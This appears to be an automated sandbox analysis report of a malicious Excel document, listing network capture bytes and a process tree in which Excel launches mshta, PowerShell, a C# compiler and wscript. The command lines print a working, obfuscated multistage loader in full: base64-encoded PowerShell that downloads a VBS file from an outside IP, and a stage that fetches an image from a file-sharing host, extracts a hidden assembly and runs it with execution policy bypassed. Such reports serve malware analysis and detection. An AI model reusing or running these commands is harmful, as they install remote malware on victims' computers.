                                                                                                                                                                                Data Ascii: !m$K4YsA(t/XaKFKSSumOai|9C\E7-"xDnRI!%l2 6M;sw>nkGUO3/SnV*GkxKL O?qX][u!>U$S^U
                                                                                                                                                                                2024-11-25 13:07:17 UTC8192INData Raw: ca 1e 65 66 47 3b 69 45 83 9a b0 4f a3 6b 20 90 a0 d2 a9 1d 30 32 8c 46 45 42 e1 9d 45 dc 7d fa e6 8e 89 52 2f 0e 54 92 e2 dc 08 ae e2 fe 39 62 f1 7a 88 fc 64 10 0a fb 62 32 ca 19 42 12 1d 57 a8 3c 8c 0d 65 9d 22 d1 c9 0c 93 2a 21 40 0b 0f 56 ea 37 c8 e8 7a 66 1e d8 13 54 e8 92 ab 47 bc ed 6a da 48 ed c6 07 ee 7e 54 9a 98 c3 85 a0 cb ea 16 15 87 61 57 df 8c 4f 4e 92 19 03 1e 47 22 c9 ba e7 03 d5 68 9a 6d 29 26 09 0a 2b a1 8d f8 bb 5e e0 e2 e1 52 17 24 30 20 71 40 76 c5 e2 d7 3c 24 a8 b6 42 28 83 fd 32 8d ae 66 1b 42 2d 7b f7 c0 7f cb 8c b1 31 90 7b a8 37 c1 cd 9f 0d 9f 46 9a ad 34 5a b0 c6 35 8b 65 00 d4 5b 79 65 b0 3a f6 ed d7 3c bc 5a b7 0c 08 0b c1 c2 e9 f5 9b 7c 46 29 a4 76 d8 b2 ab 30 53 4c 00 60 4e df 63 f9 7d 30 3e 8e fa b4 8b 58 f3 4d a8 f2 b4 ba
                                                                                                                                                                                Data Ascii: efG;iEOk 02FEBE}R/T9bzdb2BW<e"*!@V7zfTGjH~TaWONG"hm)&+^R$0 q@v<$B(2fB-{1{7F4Z5e[ye:<Z|F)v0SL`Nc}0>XM


                                                                                                                                                                                Statistics

                                                                                                                                                                                CPU Usage

                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                Memory Usage

                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                Behavior

                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                System Behavior

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:0
                                                                                                                                                                                Start time:08:06:09
                                                                                                                                                                                Start date:25/11/2024
                                                                                                                                                                                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                                                                                                                Imagebase:0x13f5f0000
                                                                                                                                                                                File size:28'253'536 bytes
                                                                                                                                                                                MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:high
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:4
                                                                                                                                                                                Start time:08:06:36
                                                                                                                                                                                Start date:25/11/2024
                                                                                                                                                                                Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                                                                                                                                Imagebase:0x13ff40000
                                                                                                                                                                                File size:13'824 bytes
                                                                                                                                                                                MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:high
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:5
                                                                                                                                                                                Start time:08:06:42
                                                                                                                                                                                Start date:25/11/2024
                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Windows\sYSTeM32\WinDowSPOWeRSHelL\V1.0\PoWersHell.Exe" "pOWerSHeLL.EXe -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE ; iEx($(Iex('[sYsTEm.TEXt.ENCodinG]'+[ChAr]0X3A+[Char]0x3A+'uTf8.GetSTRiNg([SYSTeM.ConveRt]'+[CHAr]0x3a+[ChAR]0X3A+'FROMBASE64StRING('+[cHaR]0x22+'JHZiS3kyVzJoWiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1CRVJEZUZJbml0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1hS29BY2gsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNNTlFvZnJsUUUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhadFZYTk9QLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVExxUHptVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHRMKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ1QUl0R1YiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2lsZGJGTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR2Ykt5MlcyaFo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjM0LjIwNS4xMzUvMTI0NC9jcmVhdGdvb2RpZGVhZm9yZnV0dXJlYnVzaW5lc3NkZXZlbG9wd2l0aG5pY2V0aGluZ3NnZXRiYWNrb24udElGIiwiJEVOVjpBUFBEQVRBXGNyZWF0Z29vZGlkZWFmb3JmdXR1cmVidXNpbmVzc2RldmVsb3B3aXRobmljZXRoaW4udkJzIiwwLDApO3N0QVJULVNsRWVwKDMpO0lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGNyZWF0Z29vZGlkZWFmb3JmdXR1cmVidXNpbmVzc2RldmVsb3B3aXRobmljZXRoaW4udkJzIg=='+[ChAR]0x22+'))')))"
                                                                                                                                                                                Imagebase:0x13f8a0000
                                                                                                                                                                                File size:443'392 bytes
                                                                                                                                                                                MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:8
                                                                                                                                                                                Start time:08:06:44
                                                                                                                                                                                Start date:25/11/2024
                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE
                                                                                                                                                                                Imagebase:0x13f8a0000
                                                                                                                                                                                File size:443'392 bytes
                                                                                                                                                                                MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:9
                                                                                                                                                                                Start time:08:06:47
                                                                                                                                                                                Start date:25/11/2024
                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b53lag2c\b53lag2c.cmdline"
                                                                                                                                                                                Imagebase:0x13f040000
                                                                                                                                                                                File size:2'758'280 bytes
                                                                                                                                                                                MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:10
                                                                                                                                                                                Start time:08:06:47
                                                                                                                                                                                Start date:25/11/2024
                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3100.tmp" "c:\Users\user\AppData\Local\Temp\b53lag2c\CSCFF6E95784C84671B5586A4811C47.TMP"
                                                                                                                                                                                Imagebase:0x13f560000
                                                                                                                                                                                File size:52'744 bytes
                                                                                                                                                                                MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:high
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:12
                                                                                                                                                                                Start time:08:06:53
                                                                                                                                                                                Start date:25/11/2024
                                                                                                                                                                                Path:C:\Windows\System32\wscript.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatgoodideaforfuturebusinessdevelopwithnicethin.vBs"
                                                                                                                                                                                Imagebase:0xff880000
                                                                                                                                                                                File size:168'960 bytes
                                                                                                                                                                                MD5 hash:045451FA238A75305CC26AC982472367
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:high
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:13
                                                                                                                                                                                Start time:08:06:54
                                                                                                                                                                                Start date:25/11/2024
                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnbkVyaW1hZ2VVcmwgPSBaTTVodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWwnKydla2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROScrJzUtJysnZHZpVEs1Y0FSYU5kUScrJ2piYjNtZXhmd1F6S21UWGcnKycmc2tpcHJlZz10cnVlJnBrX3ZpZCcrJz1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBaJysnTTU7bkVyd2UnKydiQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkMnKydsaWVudDtuRXJpbWFnZUJ5dGVzID0gbkVyd2ViQ2xpZW50LkRvd25sb2FkRGF0YSgnKyduRXJpbWFnZVVybCk7bkVyaW1hZ2VUZXh0ID0gWycrJ1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHInKydpbmcobkVyaW1hZ2VCeScrJ3Rlcyk7bkVyc3RhcnRGbGFnID0nKycgWk01PDxCQVNFNjRfU1RBUlQ+PlpNNScrJztuRXJlbmRGbGFnID0gWk01PDxCQVNFNjRfJysnRU5EPj5aTTU7bkVyc3RhcnRJbmRleCA9IG5FcmltYWdlVGV4JysndC5JbmRleE9mKG5FcnN0YXJ0RmxhZyk7bkVyZW5kSW5kJysnZXggPSBuRXJpbWFnZVRleHQuSW5kZXhPZignKyduRXJlbmRGbGFnKTtuRScrJ3JzdGFydEluJysnZGV4IC1nZSAwIC1hbmQgbkVyZW5kSW5kZXggLWd0IG5FcnN0YXJ0SW5kZXg7bkVyc3RhcnRJbmRleCArPSBuRXJzdGFydEZsYWcuTGVuZ3RoO25FcmJhc2U2NCcrJ0wnKydlbmd0aCA9IG5FcmVuZEluZGUnKyd4IC0gbkVyc3RhJysncnRJbmRleDtuRXJiYXNlNjRDb21tYW5kID0gbkVyaW1hZ2VUZXh0LlN1YnN0cmluZyhuRXJzdGFydEluZGV4LCBuRXJiYXNlNjRMZW5ndGgnKycpO25FcmJhc2U2NFJldmVyc2VkID0gLWpvaW4gKG5FcmJhJysnc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBKSTYgRm9yRWFjaCcrJy1PYmplY3QgeyBuRXJfIH0pWy0xLi4tKG5FcmJhc2U2NENvbW1hbmQuTGVuZ3RoKV07bkVyY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6JysnRnJvbUJhcycrJ2U2NFN0cmluZyhuRXJiYXNlNjRSZXZlcnNlZCk7bkVybG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKG5FcmNvbW1hbmRCeXRlcyk7bkVydmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCcrJyhaTTVWQUlaTTUpO25FcnZhaU1ldGhvZC5JbnZva2UobkVybnVsbCwgQChaTTV0eHQuUlNSVlJTLycrJzQ0MjEvNTMxLjUnKycwMi40MzIuMjcxLy86cHR0aFpNNSwgWk01JysnZGVzYXRpdmFkb1pNNSwgWk01ZGVzYXRpdmFkb1pNNSwgWk01ZGVzYXRpdmFkb1pNJysnNSwgWk01Q2FzUG9sWk01LCBaTTVkZXNhdGl2YWRvWk01LCBaTTVkZXNhdGl2YWRvWk01LFpNNWRlc2F0aXZhZG9aTTUsWicrJ001ZGVzYXRpdmFkb1onKydNNSxaTTVkZXNhdGl2YWRvJysnWk0nKyc1LFpNNWRlc2F0aXZhZG9aTTUsWk01ZGVzYXRpdmFkJysnb1pNNScrJyxaTTUxWk01LFpNNWRlc2F0aXZhZG9aTTUpKTsnKSAgLVJlUGxhY0UgIChbY2hhcl0xMTArW2NoYXJdNjkrW2NoYXJdMTE0KSxbY2hhcl0zNi1DUmVwbEFjRSAgJ1pNNScsW2NoYXJdMzkgIC1SZVBsYWNFKFtjaGFyXTc0K1tjaGFyXTczK1tjaGFyXTU0KSxbY2hhcl0xMjQpfCYgKCAkcFNIT01FWzRdKyRQU2hPTUVbMzBdKyd4Jyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                                                                                                                Imagebase:0x13f8a0000
                                                                                                                                                                                File size:443'392 bytes
                                                                                                                                                                                MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:15
                                                                                                                                                                                Start time:08:06:55
                                                                                                                                                                                Start date:25/11/2024
                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('nErimageUrl = ZM5https://3105.filemail.com/api/file/get?fil'+'ekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-'+'dviTK5cARaNdQ'+'jbb3mexfwQzKmTXg'+'&skipreg=true&pk_vid'+'=e0109638c9bfb9571732531309b5ff7c Z'+'M5;nErwe'+'bClient = New-Object System.Net.WebC'+'lient;nErimageBytes = nErwebClient.DownloadData('+'nErimageUrl);nErimageText = ['+'System.Text.Encoding]::UTF8.GetStr'+'ing(nErimageBy'+'tes);nErstartFlag ='+' ZM5<<BASE64_START>>ZM5'+';nErendFlag = ZM5<<BASE64_'+'END>>ZM5;nErstartIndex = nErimageTex'+'t.IndexOf(nErstartFlag);nErendInd'+'ex = nErimageText.IndexOf('+'nErendFlag);nE'+'rstartIn'+'dex -ge 0 -and nErendIndex -gt nErstartIndex;nErstartIndex += nErstartFlag.Length;nErbase64'+'L'+'ength = nErendInde'+'x - nErsta'+'rtIndex;nErbase64Command = nErimageText.Substring(nErstartIndex, nErbase64Length'+');nErbase64Reversed = -join (nErba'+'se64Command.ToCharArray() JI6 ForEach'+'-Object { nEr_ })[-1..-(nErbase64Command.Length)];nErcommandBytes = [System.Convert]::'+'FromBas'+'e64String(nErbase64Reversed);nErloadedAssembly = [System.Reflection.Assembly]::Load(nErcommandBytes);nErvaiMethod = [dnlib.IO.Home].GetMethod'+'(ZM5VAIZM5);nErvaiMethod.Invoke(nErnull, @(ZM5txt.RSRVRS/'+'4421/531.5'+'02.432.271//:ptthZM5, ZM5'+'desativadoZM5, ZM5desativadoZM5, ZM5desativadoZM'+'5, ZM5CasPolZM5, ZM5desativadoZM5, ZM5desativadoZM5,ZM5desativadoZM5,Z'+'M5desativadoZ'+'M5,ZM5desativado'+'ZM'+'5,ZM5desativadoZM5,ZM5desativad'+'oZM5'+',ZM51ZM5,ZM5desativadoZM5));') -RePlacE ([char]110+[char]69+[char]114),[char]36-CReplAcE 'ZM5',[char]39 -RePlacE([char]74+[char]73+[char]54),[char]124)|& ( $pSHOME[4]+$PShOME[30]+'x')"
                                                                                                                                                                                Imagebase:0x13f8a0000
                                                                                                                                                                                File size:443'392 bytes
                                                                                                                                                                                MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:16
                                                                                                                                                                                Start time:08:06:56
                                                                                                                                                                                Start date:25/11/2024
                                                                                                                                                                                Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                                                                                                                                Imagebase:0x13f7a0000
                                                                                                                                                                                File size:13'824 bytes
                                                                                                                                                                                MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:high
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:18
                                                                                                                                                                                Start time:08:07:02
                                                                                                                                                                                Start date:25/11/2024
                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Windows\sYSTeM32\WinDowSPOWeRSHelL\V1.0\PoWersHell.Exe" "pOWerSHeLL.EXe -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE ; iEx($(Iex('[sYsTEm.TEXt.ENCodinG]'+[ChAr]0X3A+[Char]0x3A+'uTf8.GetSTRiNg([SYSTeM.ConveRt]'+[CHAr]0x3a+[ChAR]0X3A+'FROMBASE64StRING('+[cHaR]0x22+'JHZiS3kyVzJoWiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1CRVJEZUZJbml0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1hS29BY2gsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNNTlFvZnJsUUUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhadFZYTk9QLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVExxUHptVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHRMKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ1QUl0R1YiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2lsZGJGTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR2Ykt5MlcyaFo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjM0LjIwNS4xMzUvMTI0NC9jcmVhdGdvb2RpZGVhZm9yZnV0dXJlYnVzaW5lc3NkZXZlbG9wd2l0aG5pY2V0aGluZ3NnZXRiYWNrb24udElGIiwiJEVOVjpBUFBEQVRBXGNyZWF0Z29vZGlkZWFmb3JmdXR1cmVidXNpbmVzc2RldmVsb3B3aXRobmljZXRoaW4udkJzIiwwLDApO3N0QVJULVNsRWVwKDMpO0lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGNyZWF0Z29vZGlkZWFmb3JmdXR1cmVidXNpbmVzc2RldmVsb3B3aXRobmljZXRoaW4udkJzIg=='+[ChAR]0x22+'))')))"
                                                                                                                                                                                Imagebase:0x13f8a0000
                                                                                                                                                                                File size:443'392 bytes
                                                                                                                                                                                MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:20
                                                                                                                                                                                Start time:08:07:03
                                                                                                                                                                                Start date:25/11/2024
                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE
                                                                                                                                                                                Imagebase:0x13f8a0000
                                                                                                                                                                                File size:443'392 bytes
                                                                                                                                                                                MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:21
                                                                                                                                                                                Start time:08:07:04
                                                                                                                                                                                Start date:25/11/2024
                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ovqlooon\ovqlooon.cmdline"
                                                                                                                                                                                Imagebase:0x13f020000
                                                                                                                                                                                File size:2'758'280 bytes
                                                                                                                                                                                MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:22
                                                                                                                                                                                Start time:08:07:05
                                                                                                                                                                                Start date:25/11/2024
                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES77DF.tmp" "c:\Users\user\AppData\Local\Temp\ovqlooon\CSCADDA0BE83C5E4E17A4EF3CEA725DA.TMP"
                                                                                                                                                                                Imagebase:0x13fcf0000
                                                                                                                                                                                File size:52'744 bytes
                                                                                                                                                                                MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:24
                                                                                                                                                                                Start time:08:07:10
                                                                                                                                                                                Start date:25/11/2024
                                                                                                                                                                                Path:C:\Windows\System32\wscript.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatgoodideaforfuturebusinessdevelopwithnicethin.vBs"
                                                                                                                                                                                Imagebase:0xff500000
                                                                                                                                                                                File size:168'960 bytes
                                                                                                                                                                                MD5 hash:045451FA238A75305CC26AC982472367
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:25
                                                                                                                                                                                Start time:08:07:11
                                                                                                                                                                                Start date:25/11/2024
                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                Wow64 process (32bit):false
